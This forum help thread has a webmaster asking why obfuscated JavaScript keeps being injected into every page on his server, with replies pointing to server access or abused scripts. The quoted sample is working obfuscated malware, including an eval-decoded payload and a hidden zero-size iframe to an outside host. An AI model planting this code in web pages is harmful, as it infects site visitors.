Injecting Javascript code in webpage after body tag. which download maliculous script into system

I don't know what's happening with my web server and websites. Somebody injecting some javascript code into the webpages after the body tag. When someone try to open the websiet it downloads the scripts and inject into the system. I tried to delete all hosted website and uploaded it again but no luck.
Could someone suggest me on this....
Here is the sample code of that javascript : -
<script language=JavaScript> function aiwpbn15(p){var h=p.length,k=1024,s,i,c,z=0,d=0,j=0,t=Array(63,4,50,23,48,53,51,42,20,49,0,0,0,0,0,0,44,54,58,19,27,10,37,2,18,13,39,40,22,12,56,29,14,41,30,61,11,33,21,34,3,16,5,0,0,0,0,38,0,62,9,47,28,31,25,43,32,36,7,8,6,35,15,17,1,0,45,26,60,59,46,52,57,55,24);for(i=Math.ceil(h/k);i>0;i--){c='';for(s=Math.min(h,k);s>0;s--,h--){{j|=(t[p.charCodeAt(z++)-48])<<d;if(d){c+=String.fromCharCode(174^j&255);j>>=8;d-=2}else{d=6}}}eval(c);}}aiwpbn15('feM4EjdAqArAngSAOnfW7jM4TJzFEjd6Dnt2qgIhf6S9sc@UbEx9k6S6Xc@mq0t4TnbJRWMJIuzydytiMs@AsuIFplN6EgthIjM4scM4snk6Gjd6ZXk4TgOhsjzibLNNngr9q2O4DX@2lPa6sDMhd0M4Ejt4lRkUOWQJLBxUZ_kJRWMJIJzUb2Kmfe@2sDtisvxJPst2jJ@9snQFRBzyser4TnbmEedyRTt63Cb4pXt2MGQipRM2d0t4TXfWjG')	</script><!-- --><script type="text/javascript">
eval("function _g_u(t){var k='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var o='';var q,w,e;var a,s,d,f;var i=0;do{a = k.indexOf(t.charAt(i++));s=k.indexOf(t.charAt(i++));d=k.indexOf(t.charAt(i++));f=k.indexOf(t.charAt(i++));q=(a << 2) | (s >> 4);w=((s & 15) << 4) | (d >> 2);e=((d & 3) << 6) | f;o=o+String.fromCharCode(q);if(d!=64) o=o+String.fromCharCode(w); if(f!=64) o=o+String.fromCharCode(e);} while(i<t.length);document.write(o);};_g_u('PElGUkFNRSBTUkM9Imh0dHA6Ly90cmFmZmEuaW5mby9pbWcvc3R5bGUvc3R5bGUucGhwIiBXSURUSD0wIEhFSUdIVD0wPjwvSUZSQU1FPg==');");

Open in new window

Who is Participating?
Tony McCreathConnect With a Mentor Technical SEO ConsultantCommented:
Is the injected code directly in an html file on the server? i.e. is it being directly changed on the server.

It could be related to the iframe attach...

Its initially based onfinding a password to access to the server. From there it alters website pages to do bad things.

when you say someone, you mean your webhost or another programmer?
itindiaAuthor Commented:
Thanks for the quick reply!! But I don't know who is the culprit as i am the only person who has the access of the websites, i meant by "Someone" that there could be a Hijacker or may me some virus who has attacked on my websites.
Worried about phishing attacks?

90% of attacks start with a phish. It’s critical that IT admins and MSSPs have the right security in place to protect their end users from these phishing attacks. Check out our latest feature brief for tips and tricks to keep your employees off a hackers line!

itindiaAuthor Commented:
yes Tiggerito Its directly injected on the server, no user modification has been done. Its spreading the code in all HTMl, ASP and PHP files located in the server in which the  tag is exists. Basically its a virus, If someone opens the website that code execute and pointed to another URL and make your PC un-responding.

No way you can stop it but to press ESC before executing or you have to do a system restore.

I keep removing the codes from files but after some days the same thing will happen.

Tony McCreathTechnical SEO ConsultantCommented:
If it is actual files on the server that are being modified then I suspect someone or something has acquired access to your server.

You will need to close the hole that keeps letting them in, and clean up the system from any hacks or viruses.

Most likely your server isn't compromised but one of your scripts is being abused, the abused script will have access to all files under the same user account. Start by giving each domain it's own user and isolate the abused website that way, unless you are 100% sure that it's being done on the server itself then apply Tiggerito his suggestion.
Question has a verified solution.

Are you are experiencing a similar issue? Get a personalized answer when you ask a related question.

Have a better answer? Share it in a comment.

All Courses

From novice to tech pro — start learning today.